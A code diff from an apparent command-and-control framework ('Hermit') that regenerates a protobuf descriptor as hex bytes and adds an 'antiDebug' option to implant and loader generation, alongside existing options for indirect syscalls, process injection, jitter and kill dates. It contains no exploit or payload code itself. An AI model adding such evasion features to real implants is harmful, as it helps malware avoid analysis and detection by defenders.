0x70, 0x63, - 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, - 0x43, 0x0a, 0x16, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, - 0x74, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x15, 0x2e, 0x72, 0x70, 0x63, 0x70, - 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, - 0x1a, 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, - 0x72, 0x79, 0x22, 0x00, 0x12, 0x41, 0x0a, 0x15, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, - 0x6f, 0x61, 0x64, 0x65, 0x72, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x14, 0x2e, - 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, 0x61, - 0x64, 0x65, 0x72, 0x1a, 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, - 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x18, 0x50, 0x61, 0x79, 0x6c, 0x6f, - 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x47, 0x65, 0x6e, 0x65, 0x72, - 0x61, 0x74, 0x65, 0x12, 0x17, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, - 0x6f, 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x1a, 0x10, 0x2e, 0x63, - 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, - 0x12, 0x34, 0x0a, 0x0f, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, - 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, - 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, - 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x2c, 0x0a, 0x0c, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, - 0x65, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, - 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, - 0x6e, 0x74, 0x22, 0x00, 0x12, 0x30, 0x0a, 0x0b, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, 0x65, 0x74, - 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, - 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, - 0x6e, 0x74, 0x22, 0x00, 0x30, 0x01, 0x12, 0x35, 0x0a, 0x0d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x54, - 0x61, 0x73, 0x6b, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, - 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x36, 0x0a, - 0x12, 0x54, 0x61, 0x73, 0x6b, 0x53, 0x65, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, - 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, - 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, - 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x14, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6c, 0x65, - 0x61, 0x72, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, - 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, + 0x67, 0x65, 0x22, 0x00, 0x12, 0x49, 0x0a, 0x1a, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, + 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, + 0x49, 0x64, 0x12, 0x16, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, + 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, - 0x37, 0x0a, 0x13, 0x54, 0x61, 0x73, 0x6b, 0x4c, 0x69, 0x73, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, - 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, - 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x2e, 0x0a, 0x0a, 0x4c, 0x6f, 0x6f, 0x74, - 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, - 0x6f, 0x6f, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x14, 0x4c, 0x6f, 0x6f, 0x74, - 0x43, 0x6c, 0x65, 0x61, 0x72, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, - 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x6f, 0x6f, 0x74, 0x1a, 0x11, 0x2e, + 0x32, 0x0a, 0x0f, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x47, 0x65, 0x74, 0x42, 0x79, + 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, + 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, + 0x72, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x47, + 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, + 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, + 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, 0x43, 0x0a, 0x16, 0x50, + 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x47, 0x65, 0x6e, + 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x15, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, + 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x49, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x1a, 0x10, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, + 0x12, 0x41, 0x0a, 0x15, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, 0x61, 0x64, 0x65, + 0x72, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, 0x14, 0x2e, 0x72, 0x70, 0x63, 0x70, + 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x1a, + 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, + 0x79, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x18, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x53, 0x68, + 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x47, 0x65, 0x6e, 0x65, 0x72, 0x61, 0x74, 0x65, 0x12, + 0x17, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x53, + 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x1a, 0x10, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, + 0x6e, 0x70, 0x62, 0x2e, 0x42, 0x69, 0x6e, 0x61, 0x72, 0x79, 0x22, 0x00, 0x12, 0x34, 0x0a, 0x0f, + 0x41, 0x67, 0x65, 0x6e, 0x74, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, + 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x22, 0x00, 0x42, 0x5c, 0x0a, 0x1e, 0x6f, 0x72, 0x67, 0x2e, 0x68, 0x64, 0x6b, 0x73, 0x2e, 0x68, - 0x65, 0x72, 0x6d, 0x69, 0x74, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x72, - 0x70, 0x63, 0x70, 0x62, 0x42, 0x08, 0x52, 0x50, 0x43, 0x50, 0x72, 0x6f, 0x74, 0x6f, 0x50, 0x01, - 0x5a, 0x2e, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x68, 0x69, 0x64, - 0x65, 0x63, 0x6b, 0x69, 0x65, 0x73, 0x2f, 0x68, 0x65, 0x72, 0x6d, 0x69, 0x74, 0x2f, 0x70, 0x6b, - 0x67, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, 0x72, 0x70, 0x63, 0x70, 0x62, - 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, + 0x22, 0x00, 0x12, 0x2c, 0x0a, 0x0c, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, 0x65, 0x74, 0x42, 0x79, + 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, + 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x22, 0x00, + 0x12, 0x30, 0x0a, 0x0b, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, + 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, + 0x1a, 0x0c, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x22, 0x00, + 0x30, 0x01, 0x12, 0x35, 0x0a, 0x0d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4c, + 0x69, 0x73, 0x74, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, + 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x12, 0x54, 0x61, 0x73, + 0x6b, 0x53, 0x65, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, + 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, + 0x00, 0x12, 0x38, 0x0a, 0x14, 0x54, 0x61, 0x73, 0x6b, 0x43, 0x6c, 0x65, 0x61, 0x72, 0x42, 0x79, + 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, + 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, + 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x37, 0x0a, 0x13, 0x54, + 0x61, 0x73, 0x6b, 0x4c, 0x69, 0x73, 0x74, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, + 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x1a, + 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, + 0x67, 0x65, 0x22, 0x00, 0x12, 0x2e, 0x0a, 0x0a, 0x4c, 0x6f, 0x6f, 0x74, 0x47, 0x65, 0x74, 0x41, + 0x6c, 0x6c, 0x12, 0x0b, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x6f, 0x6f, 0x74, 0x1a, + 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, + 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x14, 0x4c, 0x6f, 0x6f, 0x74, 0x43, 0x6c, 0x65, 0x61, + 0x72, 0x42, 0x79, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x0b, 0x2e, 0x72, + 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x6f, 0x6f, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, + 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x42, 0x5c, + 0x0a, 0x1e, 0x6f, 0x72, 0x67, 0x2e, 0x68, 0x64, 0x6b, 0x73, 0x2e, 0x68, 0x65, 0x72, 0x6d, 0x69, + 0x74, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, + 0x42, 0x08, 0x52, 0x50, 0x43, 0x50, 0x72, 0x6f, 0x74, 0x6f, 0x50, 0x01, 0x5a, 0x2e, 0x67, 0x69, + 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x68, 0x69, 0x64, 0x65, 0x63, 0x6b, 0x69, + 0x65, 0x73, 0x2f, 0x68, 0x65, 0x72, 0x6d, 0x69, 0x74, 0x2f, 0x70, 0x6b, 0x67, 0x2f, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, 0x72, 0x70, 0x63, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x33, } var ( diff --git a/pkg/protobuf/rpcpb/rpc.proto b/pkg/protobuf/rpcpb/rpc.proto index 7f60339..483ca27 100644 --- a/pkg/protobuf/rpcpb/rpc.proto +++ b/pkg/protobuf/rpcpb/rpc.proto @@ -90,6 +90,7 @@ message PayloadImplant { int64 jitter = 12; int64 killDate = 13; bool indirectSyscalls = 14; + bool antiDebug = 15; } message PayloadLoader { @@ -106,6 +107,7 @@ message PayloadLoader { string technique = 11; string processToInject = 12; bool indirectSyscalls = 13; + bool antiDebug = 14; } message PayloadShellcode { diff --git a/pkg/server/payload/implant.go b/pkg/server/payload/implant.go index d37a5c1..7d42c83 100644 --- a/pkg/server/payload/implant.go +++ b/pkg/server/payload/implant.go @@ -38,6 +38,7 @@ type Implant struct { Jitter uint KillDate uint IndirectSyscalls bool + AntiDebug bool } func NewImplant( @@ -55,6 +56,7 @@ func NewImplant( jitter uint, killDate uint, indirectSyscalls bool, + antiDebug bool, ) *Implant { if _uuid == "" { _uuid = uuid.NewString() @@ -78,6 +80,7 @@ func NewImplant( Jitter: jitter, KillDate: killDate, IndirectSyscalls: indirectSyscalls, + AntiDebug: antiDebug, } } @@ -175,6 +178,7 @@ func (i *Implant) Generate(serverState *state.ServerState) (data []byte, outFile fmt.Sprintf("-DPAYLOAD_JITTER=%s", fmt.Sprint(i.Jitter)), fmt.Sprintf("-DPAYLOAD_KILLDATE=%s", fmt.Sprint(i.KillDate)), fmt.Sprintf("-DPAYLOAD_INDIRECT_SYSCALLS=%t", i.IndirectSyscalls), + fmt.Sprintf("-DPAYLOAD_ANTI_DEBUG=%t", i.AntiDebug), fmt.Sprintf("-DLISTENER_PROTOCOL=\"%s\"", i.Lprotocol), fmt.Sprintf("-DLISTENER_HOST=\"%s\"", i.Lhost), fmt.Sprintf("-DLISTENER_PORT=%s", fmt.Sprint(i.Lport)), diff --git a/pkg/server/payload/loader.go b/pkg/server/payload/loader.go index b32583c..cccb441 100644 --- a/pkg/server/payload/loader.go +++ b/pkg/server/payload/loader.go @@ -29,6 +29,7 @@ type Loader struct { Technique string ProcessToInject string IndirectSyscalls bool + AntiDebug bool } func NewLoader( @@ -45,6 +46,7 @@ func NewLoader( technique string, processToInject string, indirectSyscalls bool, + antiDebug bool, ) *Loader { if _uuid == "" { _uuid = uuid.NewString() @@ -67,6 +69,7 @@ func NewLoader( Technique: technique, ProcessToInject: processToInject, IndirectSyscalls: indirectSyscalls, + AntiDebug: antiDebug, } } @@ -161,6 +164,7 @@ func (l *Loader) Generate(serverState *state.ServerState) (data []byte, outFile fmt.Sprintf("-DPAYLOAD_TECHNIQUE=\"%s\"", l.Technique), fmt.Sprintf("-DPAYLOAD_PROCESS_TO_INJECT=\"%s\"", l.ProcessToInject), fmt.Sprintf("-DPAYLOAD_INDIRECT_SYSCALLS=%t", l.IndirectSyscalls), + fmt.Sprintf("-DPAYLOAD_ANTI_DEBUG=%t", l.AntiDebug), fmt.Sprintf("-DLISTENER_PROTOCOL=\"%s\"", l.Lprotocol), fmt.Sprintf("-DLISTENER_HOST=\"%s\"", l.Lhost), fmt.Sprintf("-DLISTENER_PORT=%s", fmt.Sprint(l.Lport)), diff --git a/pkg/server/rpc/grpc.go b/pkg/server/rpc/grpc.go index cd2897e..49f73bd 100644 --- a/pkg/server/rpc/grpc.go +++ b/pkg/server/rpc/grpc.go @@ -310,6 +310,7 @@ func (s *HermitRPCServer) PayloadImplantGenerate( uint(imp.Jitter), uint(imp.KillDate), imp.IndirectSyscalls, + imp.AntiDebug, ) data, _, err := newImp.Generate(s.serverState) if err != nil { @@ -336,6 +337,7 @@ func (s *HermitRPCServer) PayloadLoaderGenerate( ldr.Technique, ldr.ProcessToInject, ldr.IndirectSyscalls, + ldr.AntiDebug, ) data, _, err := newStg.Generate(s.serverState) if err != nil {